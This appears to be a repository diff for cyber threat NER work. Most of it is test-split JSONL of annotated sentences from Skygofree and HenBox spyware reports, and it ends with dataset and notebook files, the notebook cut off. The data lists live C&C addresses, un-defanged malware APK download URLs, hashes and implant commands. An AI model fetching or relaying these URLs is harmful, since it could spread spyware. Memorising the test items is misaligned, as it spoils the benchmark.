+ {"text": "The code contains multiple comments in Italian , here is the most noteworthy example : “ Receive commands from the remote server , here you can set the key commands to command the virus ” Here are the available commands : Name Description cd Change current directory to specified quit Close the socket nggexe Execute received command via Python ’ s subprocess.Popen ( ) without outputs ngguploads Upload specified file to the specified URL nggdownloads Download content from the specified URLs and save to specified file nggfilesystem Dump file structure of the C : path , save it to the file in json format and zip it nggstart_screen nggstop_screen Enable/disable screenshot module .", "spans": {"System: Python": [[338, 344]]}, "info": {"id": "securebert2_test_00116", "source": "securebert2_test"}}
118
+ {"text": "When enabled , it makes a screenshot every 25 seconds nggstart_key nggstop_key Enable/disable keylogging module nggstart_rec nggstop_rec Enable/disable surrounding sounds recording module ngg_status Send components status to the C & C socket * any other * Execute received command via Python ’ s subprocess.Popen ( ) , output result will be sent to the C & C socket .", "spans": {"System: Python": [[285, 291]]}, "info": {"id": "securebert2_test_00117", "source": "securebert2_test"}}
119
+ {"text": "All modules set hidden attributes to their files : Module Paths Exfiltrated data format msconf.exe % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m % d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3 yyyyMMddHHmmss_out.mp3 ( skype calls records ) Moreover , we found one module written in .Net – skype_sync2.exe .", "spans": {"Indicator: msconf.exe": [[88, 98]], "Indicator: % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m % d- % H % M % S.txt ( keylogging ) wow.exe % APPDATA % /myupd/scr/ % Y % m % d- % H % M % S.jpg ( screenshots ) skype_sync2.exe % APPDATA % /myupd_tmp/skype/ % APPDATA % /myupd/skype/ yyyyMMddHHmmss_in.mp3": [[99, 550]], "Indicator: yyyyMMddHHmmss_out.mp3": [[551, 573]], "System: .Net": [[640, 644]], "Indicator: skype_sync2.exe": [[647, 662]]}, "info": {"id": "securebert2_test_00118", "source": "securebert2_test"}}
120
+ {"text": "The main purpose of this module is to exfiltrate Skype call recordings .", "spans": {"System: Skype": [[49, 54]]}, "info": {"id": "securebert2_test_00119", "source": "securebert2_test"}}
121
+ {"text": "Just like the previous modules , it contains multiple strings in Italian .", "spans": {}, "info": {"id": "securebert2_test_00120", "source": "securebert2_test"}}
122
+ {"text": "After launch , it downloads a codec for MP3 encoding directly from the C & C server : http : //54.67.109.199/skype_resource/libmp3lame.dll The skype_sync2.exe module has a compilation timestamp – Feb 06 2017 and the following PDB string : \\\\vmware-host\\Shared Folders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb network.exe is a module for submitting all exfiltrated data to the server .", "spans": {"Indicator: http : //54.67.109.199/skype_resource/libmp3lame.dll": [[86, 138]], "Indicator: skype_sync2.exe": [[143, 158]], "Indicator: \\\\vmware-host\\Shared": [[239, 259]], "Indicator: Folders\\dati\\Backup\\Projects\\REcodin_2\\REcodin_2\\obj\\x86\\Release\\REcodin_2.pdb": [[260, 338]], "Indicator: network.exe": [[339, 350]]}, "info": {"id": "securebert2_test_00121", "source": "securebert2_test"}}
123
+ {"text": "In the observed version of the implant it doesn ’ t have an interface to work with the skype_sync2.exe module .", "spans": {"Indicator: skype_sync2.exe": [[87, 102]]}, "info": {"id": "securebert2_test_00122", "source": "securebert2_test"}}
124
+ {"text": "network.exe submitting to the server code snippet Code similarities We found some code similarities between the implant for Windows and other public accessible projects .", "spans": {"Indicator: network.exe": [[0, 11]], "System: Windows": [[124, 131]]}, "info": {"id": "securebert2_test_00123", "source": "securebert2_test"}}
125
+ {"text": "https : //github.com/El3ct71k/Keylogger/ It appears the developers have copied the functional part of the keylogger module from this project .", "spans": {"Indicator: https : //github.com/El3ct71k/Keylogger/": [[0, 40]]}, "info": {"id": "securebert2_test_00124", "source": "securebert2_test"}}
126
+ {"text": "update.exe module and Keylogger by ‘ El3ct71k ’ code comparison Xenotix Python Keylogger including specified mutex ‘ mutex_var_xboz ’ .", "spans": {"Indicator: update.exe": [[0, 10]], "System: Xenotix Python Keylogger": [[64, 88]]}, "info": {"id": "securebert2_test_00125", "source": "securebert2_test"}}
127
+ {"text": "update.exe module and Xenotix Python Keylogger code comparison ‘ addStartup ’ method from msconf.exe module ‘ addStartup ’ method from Xenotix Python Keylogger Distribution We found several landing pages that spread the Android implants .", "spans": {"Indicator: update.exe": [[0, 10]], "System: Xenotix Python Keylogger": [[22, 46], [135, 159]], "Indicator: msconf.exe": [[90, 100]], "System: Android": [[220, 227]]}, "info": {"id": "securebert2_test_00126", "source": "securebert2_test"}}
128
+ {"text": "Malicious URL Referrer Dates http : //217.194.13.133/tre/internet/Configuratore_3.apk http : //217.194.13.133/tre/internet/ 2015-02-04 to present time http : //217.194.13.133/appPro_AC.apk – 2015-07-01 http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html 2015-01-20 to present time http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http : //vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04 http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate.serveftp.com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : //119.network/lte/download.html 2015-02-04 2015-07-20 http : //119.network/lte/Configuratore_TIM.apk 2015-07-08 Many of these domains are outdated , but almost all ( except one – appPro_AC.apk ) samples located on the 217.194.13.133 server are still accessible .", "spans": {"Indicator: http : //217.194.13.133/tre/internet/Configuratore_3.apk": [[29, 85]], "Indicator: http : //217.194.13.133/tre/internet/": [[86, 123]], "Indicator: http : //217.194.13.133/appPro_AC.apk": [[151, 188]], "Indicator: http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk": [[202, 306]], "Indicator: http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html": [[307, 380], [502, 575]], "Indicator: http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk": [[408, 501]], "Indicator: http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk": [[593, 663]], "Indicator: http : //vodafoneinfinity.sytes.net/tim/internet/": [[664, 713]], "Indicator: http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk": [[725, 841]], "Indicator: http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/": [[842, 917]], "Indicator: http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk": [[929, 1008]], "Indicator: http : //windupdate.serveftp.com/wind/LTE/": [[1009, 1051]], "Indicator: http : //119.network/lte/Internet-TIM-4G-LTE.apk": [[1063, 1111]], "Indicator: http : //119.network/lte/download.html": [[1112, 1150]], "Indicator: http : //119.network/lte/Configuratore_TIM.apk": [[1173, 1219]], "Indicator: appPro_AC.apk": [[1298, 1311]], "Indicator: 217.194.13.133": [[1337, 1351]]}, "info": {"id": "securebert2_test_00127", "source": "securebert2_test"}}
129
+ {"text": "All the observed landing pages mimic the mobile operators ’ web pages through their domain name and web page content as well .", "spans": {}, "info": {"id": "securebert2_test_00128", "source": "securebert2_test"}}
130
+ {"text": "Further research of the attacker ’ s infrastructure revealed more related mimicking domains .", "spans": {}, "info": {"id": "securebert2_test_00129", "source": "securebert2_test"}}
131
+ {"text": "Unfortunately , for now we can ’ t say in what environment these landing pages were used in the wild , but according to all the information at our dsiposal , we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks .", "spans": {}, "info": {"id": "securebert2_test_00130", "source": "securebert2_test"}}
132
+ {"text": "For example , this could be when the victim ’ s device connects to a Wi-Fi access point that is infected or controlled by the attackers .", "spans": {}, "info": {"id": "securebert2_test_00131", "source": "securebert2_test"}}
133
+ {"text": "Artifacts During the research , we found plenty of traces of the developers and those doing the maintaining .", "spans": {}, "info": {"id": "securebert2_test_00132", "source": "securebert2_test"}}
134
+ {"text": "As already stated in the ‘ malware features ’ part , there are multiple giveaways in the code .", "spans": {}, "info": {"id": "securebert2_test_00133", "source": "securebert2_test"}}
135
+ {"text": "Here are just some of them : ngglobal – FirebaseCloudMessaging topic name Issuer : CN = negg – from several certificates negg.ddns [ .", "spans": {"Indicator: negg.ddns [ .": [[121, 134]]}, "info": {"id": "securebert2_test_00134", "source": "securebert2_test"}}
136
+ {"text": "] net , negg1.ddns [ .", "spans": {"Indicator: negg1.ddns [ .": [[8, 22]]}, "info": {"id": "securebert2_test_00135", "source": "securebert2_test"}}
137
+ {"text": "] net , negg2.ddns [ .", "spans": {"Indicator: negg2.ddns [ .": [[8, 22]]}, "info": {"id": "securebert2_test_00136", "source": "securebert2_test"}}
138
+ {"text": "] net – C & C servers NG SuperShell – string from the reverse shell payload ngg – prefix in commands names of the implant for Windows Signature with specific issuer Whois records and IP relationships provide many interesting insights as well .", "spans": {"System: Windows": [[126, 133]]}, "info": {"id": "securebert2_test_00137", "source": "securebert2_test"}}
139
+ {"text": "There are a lot of other ‘ Negg ’ mentions in Whois records and references to it .", "spans": {}, "info": {"id": "securebert2_test_00138", "source": "securebert2_test"}}
140
+ {"text": "For example : Conclusions The Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform .", "spans": {"Malware: Skygofree": [[30, 39]], "System: Android": [[40, 47]]}, "info": {"id": "securebert2_test_00139", "source": "securebert2_test"}}
141
+ {"text": "As a result of the long-term development process , there are multiple , exceptional capabilities : usage of multiple exploits for gaining root privileges , a complex payload structure , never-before-seen surveillance features such as recording surrounding audio in specified locations .", "spans": {}, "info": {"id": "securebert2_test_00140", "source": "securebert2_test"}}
142
+ {"text": "Given the many artifacts we discovered in the malware code , as well as infrastructure analysis , we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions , just like HackingTeam .", "spans": {"Malware: Skygofree": [[148, 157]], "Organization: HackingTeam": [[241, 252]]}, "info": {"id": "securebert2_test_00141", "source": "securebert2_test"}}
143
+ {"text": "HenBox : The Chickens Come Home to Roost March 13 , 2018 at 5:00 AM Unit 42 recently discovered a new Android malware family we named “ HenBox ” masquerading as a variety of legitimate Android apps .", "spans": {"Malware: HenBox": [[0, 6], [136, 142]], "System: Android": [[102, 109], [185, 192]]}, "info": {"id": "securebert2_test_00142", "source": "securebert2_test"}}
144
+ {"text": "We chose the name “ HenBox ” based on metadata found in most of the malicious apps such as package names and signer detail .", "spans": {"Malware: HenBox": [[20, 26]]}, "info": {"id": "securebert2_test_00143", "source": "securebert2_test"}}
145
+ {"text": "HenBox masquerades as apps such as VPN and Android system apps and often installs legitimate versions of these apps along with HenBox to trick users into thinking they downloaded the legitimate app .", "spans": {"Malware: HenBox": [[0, 6], [127, 133]], "System: Android": [[43, 50]]}, "info": {"id": "securebert2_test_00144", "source": "securebert2_test"}}
146
+ {"text": "While some of the legitimate apps HenBox use as decoys can be found on Google Play , HenBox apps themselves have only been found on third-party ( non-Google Play ) app stores .", "spans": {"Malware: HenBox": [[34, 40], [85, 91]], "System: Google Play": [[71, 82]], "System: Play": [[157, 161]]}, "info": {"id": "securebert2_test_00145", "source": "securebert2_test"}}
147
+ {"text": "HenBox appears to primarily target the Uyghurs – a minority Turkic ethnic group that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in North West China .", "spans": {"Malware: HenBox": [[0, 6]]}, "info": {"id": "securebert2_test_00146", "source": "securebert2_test"}}
148
+ {"text": "It also targets devices made by Chinese manufacturer Xiaomi and those running MIUI , an operating system based on Google Android made by Xiaomi .", "spans": {"Organization: Xiaomi": [[53, 59], [137, 143]], "System: MIUI": [[78, 82]], "System: Google Android": [[114, 128]]}, "info": {"id": "securebert2_test_00147", "source": "securebert2_test"}}
149
+ {"text": "Smartphones are the dominant form of internet access in the region and Xinjiang was recently above the national average of internet users in China .", "spans": {}, "info": {"id": "securebert2_test_00148", "source": "securebert2_test"}}
150
+ {"text": "The result is a large online population who have been the subject of numerous cyber-attacks in the past .", "spans": {}, "info": {"id": "securebert2_test_00149", "source": "securebert2_test"}}
151
+ {"text": "Once installed , HenBox steals information from the devices from a myriad of sources , including many mainstream chat , communication , and social media apps .", "spans": {"Malware: HenBox": [[17, 23]]}, "info": {"id": "securebert2_test_00150", "source": "securebert2_test"}}
152
+ {"text": "The stolen information includes personal and device information .", "spans": {}, "info": {"id": "securebert2_test_00151", "source": "securebert2_test"}}
153
+ {"text": "Of note , in addition to tracking the compromised device ’ s location , HenBox also harvests all outgoing phone numbers with an “ 86 ” prefix , which is the country code for the People ’ s Republic of China ( PRC ) .", "spans": {"Malware: HenBox": [[72, 78]]}, "info": {"id": "securebert2_test_00152", "source": "securebert2_test"}}
154
+ {"text": "It can also access the phone ’ s cameras and microphone .", "spans": {}, "info": {"id": "securebert2_test_00153", "source": "securebert2_test"}}
155
+ {"text": "HenBox has ties to infrastructure used in targeted attacks with a focus on politics in South East Asia .", "spans": {"Malware: HenBox": [[0, 6]]}, "info": {"id": "securebert2_test_00154", "source": "securebert2_test"}}
156
+ {"text": "These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX , Zupdax , 9002 , and Poison Ivy .", "spans": {"Malware: PlugX": [[112, 117]], "Malware: Zupdax": [[120, 126]], "Malware: 9002": [[129, 133]], "Malware: Poison Ivy": [[140, 150]]}, "info": {"id": "securebert2_test_00155", "source": "securebert2_test"}}
157
+ {"text": "This also aligns with HenBox ’ s timeline , as in total we have identified almost 200 HenBox samples , with the oldest dating to 2015 .", "spans": {"Malware: HenBox": [[22, 28], [86, 92]]}, "info": {"id": "securebert2_test_00156", "source": "securebert2_test"}}
158
+ {"text": "Most of the samples we found date from the last half of 2017 , fewer samples date from 2016 , and a handful date back to 2015 .", "spans": {}, "info": {"id": "securebert2_test_00157", "source": "securebert2_test"}}
159
+ {"text": "In 2018 , we have already observed a small but consistent number of samples .", "spans": {}, "info": {"id": "securebert2_test_00158", "source": "securebert2_test"}}
160
+ {"text": "We believe this indicates a fairly sustained campaign that has gained momentum over recent months .", "spans": {}, "info": {"id": "securebert2_test_00159", "source": "securebert2_test"}}
161
+ {"text": "HenBox Enters the Uyghur App Store In May 2016 , a HenBox app was downloaded from uyghurapps [ .", "spans": {"Malware: HenBox": [[0, 6], [51, 57]], "System: Uyghur App Store": [[18, 34]], "Indicator: uyghurapps [ .": [[82, 96]]}, "info": {"id": "securebert2_test_00160", "source": "securebert2_test"}}
162
+ {"text": "] net .", "spans": {}, "info": {"id": "securebert2_test_00161", "source": "securebert2_test"}}
163
+ {"text": "Specifically , the app was an Android Package ( APK ) file that will be discussed in more detail shortly .", "spans": {"System: Android Package": [[30, 45]]}, "info": {"id": "securebert2_test_00162", "source": "securebert2_test"}}
164
+ {"text": "The domain name , language of the site and app content hosted suggest this site is a third-party app store for whom the intended users are the Uyghurs .", "spans": {}, "info": {"id": "securebert2_test_00163", "source": "securebert2_test"}}
165
+ {"text": "Such app stores are so-called because they are not officially supported by Android , nor are they provided by Google , unlike the Play Store .", "spans": {"System: Android": [[75, 82]], "Organization: Google": [[110, 116]], "System: Play Store": [[130, 140]]}, "info": {"id": "securebert2_test_00164", "source": "securebert2_test"}}
166
+ {"text": "Third-party app stores are ubiquitous in China for a number of reasons including : evermore powerful Chinese Original Equipment Manufacturers ( OEM ) , a lack of an official Chinese Google Play app store , and a growing smartphone market .", "spans": {"Organization: Chinese Original Equipment Manufacturers ( OEM )": [[101, 149]], "System: Google Play": [[182, 193]]}, "info": {"id": "securebert2_test_00165", "source": "securebert2_test"}}
167
+ {"text": "The HenBox app downloaded in May 2016 was masquerading as the DroidVPN app .", "spans": {"Malware: HenBox": [[4, 10]], "Indicator: DroidVPN": [[62, 70]]}, "info": {"id": "securebert2_test_00166", "source": "securebert2_test"}}
168
+ {"text": "At the time of writing , the content served at the given URL on uyghurapps [ .", "spans": {"Indicator: uyghurapps [ .": [[64, 78]]}, "info": {"id": "securebert2_test_00167", "source": "securebert2_test"}}
169
+ {"text": "] net , is now a legitimate version of the DroidVPN app , and looks as shown in Figure 1 below .", "spans": {"Indicator: DroidVPN": [[43, 51]]}, "info": {"id": "securebert2_test_00168", "source": "securebert2_test"}}
170
+ {"text": "henbox_2 Figure 1 Uyghurapps [ .", "spans": {"Indicator: Uyghurapps [ .": [[18, 32]]}, "info": {"id": "securebert2_test_00169", "source": "securebert2_test"}}
171
+ {"text": "] net app store showing the current DroidVPN app Virtual Private Network ( VPN ) tools allow connections to remote private networks , increasing the security and privacy of the user ’ s communications .", "spans": {"Indicator: DroidVPN": [[36, 44]]}, "info": {"id": "securebert2_test_00170", "source": "securebert2_test"}}
172
+ {"text": "According to the DroidVPN app description , it “ helps bypass regional internet restrictions , web filtering and firewalls by tunneling traffic over ICMP. ” Some features may require devices to be rooted to function and according to some 3rd party app stores , unconditional rooting is required , which has additional security implications for the device .", "spans": {"Indicator: DroidVPN": [[17, 25]]}, "info": {"id": "securebert2_test_00171", "source": "securebert2_test"}}
173
+ {"text": "We have not been able to ascertain how the DroidVPN app on the uyghurapps [ .", "spans": {"Indicator: DroidVPN": [[43, 51]], "Indicator: uyghurapps [ .": [[63, 77]]}, "info": {"id": "securebert2_test_00172", "source": "securebert2_test"}}
174
+ {"text": "] net app store was replaced with the malicious HenBox app ; however , some indicators point to the server running an outdated version of Apache Web Server on a Windows 32-Bit operating system .", "spans": {"Malware: HenBox": [[48, 54]], "System: Windows": [[161, 168]]}, "info": {"id": "securebert2_test_00173", "source": "securebert2_test"}}
175
+ {"text": "In light of this , we believe an attack against unpatched vulnerabilities is a reasonable conjecture for how the server was compromised .", "spans": {"Vulnerability: unpatched vulnerabilities": [[48, 73]]}, "info": {"id": "securebert2_test_00174", "source": "securebert2_test"}}
176
+ {"text": "The HenBox app downloaded in May 2016 , as described in Table 1 below , masquerades as a legitimate version of the DroidVPN app by using the same app name “ DroidVPN ” and the same iconography used when displaying the app in Android ’ s launcher view , as highlighted in Figure 2 below Table 1 .", "spans": {"Indicator: DroidVPN": [[115, 123]], "System: DroidVPN": [[157, 165]], "System: Android": [[225, 232]]}, "info": {"id": "securebert2_test_00175", "source": "securebert2_test"}}
177
+ {"text": "APK SHA256 Size ( bytes ) First Seen App Package name App name 0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 com.android.henbox DroidVPN Table 1 Details of the HenBox DroidVPN app on the uyghurapps [ .", "spans": {"Indicator: 0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7": [[63, 127]], "Indicator: com.android.henbox": [[147, 165]], "System: DroidVPN": [[166, 174], [205, 213]], "Malware: HenBox": [[198, 204]], "Indicator: uyghurapps [ .": [[225, 239]]}, "info": {"id": "securebert2_test_00176", "source": "securebert2_test"}}
178
+ {"text": "] net app store henbox_3 Figure 2 HenBox app installed , purporting to be DroidVPN Depending on the language setting on the device , and for this particular variant of HenBox , the installed HenBox app may have the name “ Backup ” but uses the same DroidVPN logo .", "spans": {"Malware: HenBox": [[34, 40], [168, 174], [191, 197]], "Indicator: DroidVPN": [[74, 82], [249, 257]]}, "info": {"id": "securebert2_test_00177", "source": "securebert2_test"}}
179
+ {"text": "Other variants use other names and logos , as described later .", "spans": {}, "info": {"id": "securebert2_test_00178", "source": "securebert2_test"}}
180
+ {"text": "Given the DroidVPN look and feel being used by this variant of HenBox , it ’ s highly likely the uyghurapps [ .", "spans": {"Indicator: DroidVPN": [[10, 18]], "Malware: HenBox": [[63, 69]], "Indicator: uyghurapps [ .": [[97, 111]]}, "info": {"id": "securebert2_test_00179", "source": "securebert2_test"}}
181
+ {"text": "] net page for DroidVPN remained identical when serving either HenBox or DroidVPN apps , just that the legitimate APK file had been replaced with HenBox for an unknown period of time .", "spans": {"Indicator: DroidVPN": [[15, 23], [73, 81]], "Malware: HenBox": [[63, 69]]}, "info": {"id": "securebert2_test_00180", "source": "securebert2_test"}}
182
+ {"text": "In addition to the look and feel of DroidVPN , this HenBox variant also contained a legitimate DroidVPN app within its APK package as an asset , which could be compared to a resource item within a Windows Portable Executable ( PE ) file .", "spans": {"Indicator: DroidVPN": [[36, 44], [95, 103]], "Malware: HenBox": [[52, 58]], "System: Windows Portable Executable": [[197, 224]]}, "info": {"id": "securebert2_test_00181", "source": "securebert2_test"}}
183
+ {"text": "Once the HenBox app is installed and launched , it launches an install process for the embedded app as a decoy to other malicious behaviors occurring in the background , and to satisfy the victim with the app they were requesting , assuming they requested to download a particular app , such as DroidVPN .", "spans": {"Malware: HenBox": [[9, 15]], "System: DroidVPN": [[295, 303]]}, "info": {"id": "securebert2_test_00182", "source": "securebert2_test"}}
184
+ {"text": "The version of the legitimate DroidVPN embedded inside this HenBox variant is the same version of DroidVPN available for download from uyghurapps [ .", "spans": {"Indicator: DroidVPN": [[30, 38], [98, 106]], "Malware: HenBox": [[60, 66]], "Indicator: uyghurapps [ .": [[135, 149]]}, "info": {"id": "securebert2_test_00183", "source": "securebert2_test"}}
185
+ {"text": "] net , at the time of writing .", "spans": {}, "info": {"id": "securebert2_test_00184", "source": "securebert2_test"}}
186
+ {"text": "It ’ s worth noting , newer versions of the DroidVPN app are available on Google Play , as well as in some other third-party app stores , which could indicate uyghurapps [ .", "spans": {"System: DroidVPN": [[44, 52]], "System: Google Play": [[74, 85]], "Indicator: uyghurapps [ .": [[159, 173]]}, "info": {"id": "securebert2_test_00185", "source": "securebert2_test"}}
187
+ {"text": "] net is not awfully well maintained or updated to the latest apps available .", "spans": {}, "info": {"id": "securebert2_test_00186", "source": "securebert2_test"}}
188
+ {"text": "At the time of writing , to our knowledge no other third-party app stores , nor the official Google Play store , were or are hosting this malicious HenBox variant masquerading as DroidVPN .", "spans": {"System: Google Play": [[93, 104]], "Malware: HenBox": [[148, 154]], "Indicator: DroidVPN": [[179, 187]]}, "info": {"id": "securebert2_test_00187", "source": "securebert2_test"}}
189
+ {"text": "The Right App at the Right Time The malicious HenBox and embedded DroidVPN app combination is one instance of the type of legitimate apps the attackers choose to mimic to compromise their victims .", "spans": {"Malware: HenBox": [[46, 52]], "Indicator: DroidVPN": [[66, 74]]}, "info": {"id": "securebert2_test_00188", "source": "securebert2_test"}}
190
+ {"text": "These threat actors frequently offer malicious apps purporting to be legitimate apps that are broadly used or important to a targeted population .", "spans": {}, "info": {"id": "securebert2_test_00189", "source": "securebert2_test"}}
191
+ {"text": "It ’ s worth noting however , about one-third of the HenBox apps contained embedded APK objects that did not refer to legitimate apps .", "spans": {"Malware: HenBox": [[53, 59]]}, "info": {"id": "securebert2_test_00190", "source": "securebert2_test"}}
192
+ {"text": "Some were only 3 bytes long , containing strings such as “ ddd ” and “ 333 ” , or were otherwise corrupted .", "spans": {}, "info": {"id": "securebert2_test_00191", "source": "securebert2_test"}}
193
+ {"text": "Beyond the previously mentioned DroidVPN example , other viable embedded apps we found include apps currently available on Google Play , as well as many third-party app stores .", "spans": {"Indicator: DroidVPN": [[32, 40]], "System: Google Play": [[123, 134]]}, "info": {"id": "securebert2_test_00192", "source": "securebert2_test"}}
194
+ {"text": "Table 2 below lists some of these apps with their respective metadata .", "spans": {}, "info": {"id": "securebert2_test_00193", "source": "securebert2_test"}}
195
+ {"text": "Sample 1 marks the first HenBox sample we saw embedding a legitimate app within its assets to be dropped and installed on the victim device as a decoy .", "spans": {"Malware: HenBox": [[25, 31]]}, "info": {"id": "securebert2_test_00194", "source": "securebert2_test"}}
196
+ {"text": "The legitimate app in question was a Uyghur language keyboard app targeted at native speakers of the Uyghur language and their smartphones .", "spans": {}, "info": {"id": "securebert2_test_00195", "source": "securebert2_test"}}
197
+ {"text": "Sample 2 , has the package name cn.android.setting masquerading as Android ’ s Settings app , which has a similar package name ( com.android.settings ) .", "spans": {"Indicator: cn.android.setting": [[32, 50]], "System: Settings app": [[79, 91]], "Indicator: com.android.settings": [[129, 149]]}, "info": {"id": "securebert2_test_00196", "source": "securebert2_test"}}
198
+ {"text": "This variant of HenBox also used the common green Android figure as the app logo and was named 设置 ( “ Backup ” in English ) .", "spans": {"Malware: HenBox": [[16, 22]], "System: Android": [[50, 57]]}, "info": {"id": "securebert2_test_00197", "source": "securebert2_test"}}
199
+ {"text": "This variant ’ s app name , along with many others , is written in Chinese and describes the app as a backup tool .", "spans": {}, "info": {"id": "securebert2_test_00198", "source": "securebert2_test"}}
200
+ {"text": "Please see the IOCs section for all app and package name combinations .", "spans": {}, "info": {"id": "securebert2_test_00199", "source": "securebert2_test"}}
data/processed/backup/securebert2_train.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/raw/APTNER/APTNERdev.txt ADDED
The diff for this file is too large to render. See raw diff
 
data/raw/APTNER/APTNERtest.txt ADDED
The diff for this file is too large to render. See raw diff
 
data/raw/APTNER/APTNERtrain.txt ADDED
The diff for this file is too large to render. See raw diff
 
data/raw/APTNER/README.md ADDED
@@ -0,0 +1,6 @@
 
 
 
 
 
 
 
1
+ # APTNER
2
+ provides a new dataset for NER missions in cyber threat intelligence (CTI) field. we have defined 21 entity types.
3
+ <p>
4
+ If you use the dataset, please cite this thesis:
5
+ Xuren Wang, Songheng He, Zihan Xiong, Xinxin Wei, Zhangwei Jiang, Sihan Chen, Jun Jiang. APTNER: A Specific Dataset for NER Missions in Cyber Threat Intelligence Field[C]//2022 IEEE 25th International Conference on Computer Supported Cooperative Work in Design, CSCWD 2022, p 1233-1238. 2022.05
6
+ </p>
data/raw/CyNER/.gitignore ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .DS_Store
2
+ __pycache__/
3
+ *.ipynb_checkpoints
4
+ nohup.out
5
+ .python-version
6
+ *.pyc
7
+ .idea
8
+ build
9
+ *.egg-info
10
+ dist
11
+
12
+ ckpt*
13
+ vocab
14
+ apex
15
+ cache
data/raw/CyNER/CyNER Demo.ipynb ADDED
@@ -0,0 +1,254 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "cells": [
3
+ {
4
+ "cell_type": "markdown",
5
+ "id": "c0343121",
6
+ "metadata": {},
7
+ "source": [
8
+ "#### Import CyNER and get model"
9
+ ]
10
+ },
11
+ {
12
+ "cell_type": "code",
13
+ "execution_count": 1,
14
+ "id": "b954353d",
15
+ "metadata": {},
16
+ "outputs": [],
17
+ "source": [
18
+ "import cyner"
19
+ ]
20
+ },
21
+ {
22
+ "cell_type": "markdown",
23
+ "id": "4749a612",
24
+ "metadata": {},
25
+ "source": [
26
+ "#### Model1: Only using pretrained transformers"
27
+ ]
28
+ },
29
+ {
30
+ "cell_type": "code",
31
+ "execution_count": 2,
32
+ "id": "3766f0e3",
33
+ "metadata": {},
34
+ "outputs": [],
35
+ "source": [
36
+ "model1 = cyner.CyNER(transformer_model='xlm-roberta-large', use_heuristic=False, flair_model=None)"
37
+ ]
38
+ },
39
+ {
40
+ "cell_type": "code",
41
+ "execution_count": 3,
42
+ "id": "e4931f22",
43
+ "metadata": {},
44
+ "outputs": [
45
+ {
46
+ "name": "stdout",
47
+ "output_type": "stream",
48
+ "text": [
49
+ "Proofpoint report mentions that the German-language messages were turned off once the UK messages were established, indicating a conscious effort to spread FluBot 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80 in Android phones.\n"
50
+ ]
51
+ }
52
+ ],
53
+ "source": [
54
+ "text = 'Proofpoint report mentions that the German-language messages were turned off once the UK messages were established, indicating a conscious effort to spread FluBot 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80 in Android phones.'\n",
55
+ "print(text)"
56
+ ]
57
+ },
58
+ {
59
+ "cell_type": "code",
60
+ "execution_count": 4,
61
+ "id": "f8f94a99",
62
+ "metadata": {},
63
+ "outputs": [
64
+ {
65
+ "name": "stderr",
66
